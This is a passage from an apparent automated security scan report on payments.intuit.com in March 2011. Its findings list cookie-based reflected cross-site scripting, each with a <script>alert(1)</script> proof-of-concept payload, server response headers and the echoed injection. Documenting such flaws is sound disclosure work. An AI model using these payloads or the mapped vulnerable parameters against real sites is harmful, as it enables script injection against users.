Date: Mon, 21 Mar 2011 17:03:19 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=5mwmxN-YSeEUWnoCbHA8dw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:20 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95EEADD0A0805192AA117E3455FA2C5
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140402

...[SNIP]...
<input id="testGroup" value="T16237a8"><script>alert(1)</script>3c9a92fa8e4" type="hidden" />
...[SNIP]...

2.171. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 72ea0<script>alert(1)</script>71ad3f15145 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:20 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=0gJsq4xKWOU5zI3BdZ9jRQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:21 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960C1040A0805192AA117E3D2A016E8
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140388

...[SNIP]...
<br />
A/B Test Group: T1672ea0<script>alert(1)</script>71ad3f15145<br />
...[SNIP]...

2.172. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e45dc<script>alert(1)</script>7c80ec2b9be was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:00 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=NM1cXKOSTgpWuZZ0jneybw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:01 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960766B0A0805192AA117E3B896B94C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133369

...[SNIP]...
<br />
A/B Test Group: T16e45dc<script>alert(1)</script>7c80ec2b9be<br />
...[SNIP]...

2.173. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ddf"><script>alert(1)</script>911cfbd5c1d was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:11 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=f4soDtGYnfBpe017ileG8g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:12 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95ECC960A0805192AA117E3449F5EA1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133382

...[SNIP]...
<input id="testGroup" value="T1621ddf"><script>alert(1)</script>911cfbd5c1d" type="hidden" />
...[SNIP]...

2.174. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 50dd2<script>alert(1)</script>22b5eb89f33 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ViaN1JLvyhJWw4q1FY+pbQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960F7BF0A0805192AA117E309026F6B
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116178

...[SNIP]...
<br />
A/B Test Group: T1650dd2<script>alert(1)</script>22b5eb89f33<br />
...[SNIP]...

2.175. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd521"><script>alert(1)</script>a06b40a6939 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:43 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=gnsGbWiUDyBE9UrkkOZqgQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:44 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F49A80A0805192AA117E32E9263C0
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116193

...[SNIP]...
<input id="testGroup" value="T16bd521"><script>alert(1)</script>a06b40a6939" type="hidden" />
...[SNIP]...

2.176. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8b6"><script>alert(1)</script>db141cf2372 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=RUmeJMQW2zeQXOeH5zndeA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:05 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95EAE770A0805192AA117E34C30FA1D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150366

...[SNIP]...
<input id="testGroup" value="T16be8b6"><script>alert(1)</script>db141cf2372" type="hidden" />
...[SNIP]...

2.177. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ccada<script>alert(1)</script>03b0d3d035e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:55 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=53Fsh9ZkrUDHbp7oUMHGEQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:56 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9605F990A0805192AA117E3E93D0972
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150350

...[SNIP]...
<br />
A/B Test Group: T16ccada<script>alert(1)</script>03b0d3d035e<br />
...[SNIP]...

2.178. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cec2"><script>alert(1)</script>271f29d1570 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:45 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=8uIscsyAcAxK6UG5XBL70g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:46 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D7A010A0805192AA117E37D24A810
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121588

...[SNIP]...
<input id="testGroup" value="T162cec2"><script>alert(1)</script>271f29d1570" type="hidden" />
...[SNIP]...

2.179. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 3073f<script>alert(1)</script>daf5c68037 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:23 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=vrChgoohWVM8zjK8gWTXgQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:24 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95EFA180A0805192AA117E32813E0CE
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121570

...[SNIP]...
<br />
A/B Test Group: T163073f<script>alert(1)</script>daf5c68037<br />
...[SNIP]...

2.180. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload a853f<script>alert(1)</script>6d2e750d194 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=dkvxEMxSJoNDWw3yYMG1Ug**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E9B810A0805192AA117E3BA39685A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127098

...[SNIP]...
<br />
A/B Test Group: T16a853f<script>alert(1)</script>6d2e750d194<br />
...[SNIP]...

2.181. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda72"><script>alert(1)</script>0bd96e557df was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:18 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=glcdfXA9NtOUrBVpxZTdFA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:19 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D10D60A0805192AA117E3998AC0B7
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127114

...[SNIP]...
<input id="testGroup" value="T16bda72"><script>alert(1)</script>0bd96e557df" type="hidden" />
...[SNIP]...

2.182. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 49004<script>alert(1)</script>a5a17e50b33 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=60SdIUifGBPKGJj3gZgUzg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9600E320A0805192AA117E3CB159DAA
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116390

...[SNIP]...
<br />
A/B Test Group: T1649004<script>alert(1)</script>a5a17e50b33<br />
...[SNIP]...

2.183. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2219"><script>alert(1)</script>d85e888e13e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

